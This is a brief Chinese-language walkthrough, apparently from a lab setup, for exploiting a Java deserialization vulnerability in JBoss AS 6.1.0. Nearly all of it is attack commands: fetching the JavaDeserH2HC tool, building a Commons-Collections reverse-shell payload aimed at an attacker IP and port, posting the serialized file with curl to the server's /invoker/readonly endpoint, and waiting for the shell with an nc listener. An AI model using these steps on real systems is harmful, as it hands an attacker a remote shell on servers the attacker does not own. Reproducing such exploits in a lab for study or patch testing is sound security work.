搭建Jboss环境,这里用到的是jboss-as-distribution-6.1.0.Final,可以去官网下载安装
下载工具:
http://scan.javasec.cn/java/JavaDeserH2HC.zip
使用:
root@kali:~/JavaDeserH2HC# javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
root@kali:~/JavaDeserH2HC# java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.13.xxx:4444
WARNING
这个时候会生成一个ReverseShellCommonsCollectionsHashMap.ser文件,curl 这个二进制文件就可以了。
curl http://192.168.13.196:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
另外打开一个窗口监听
nc -vv -l -p 4444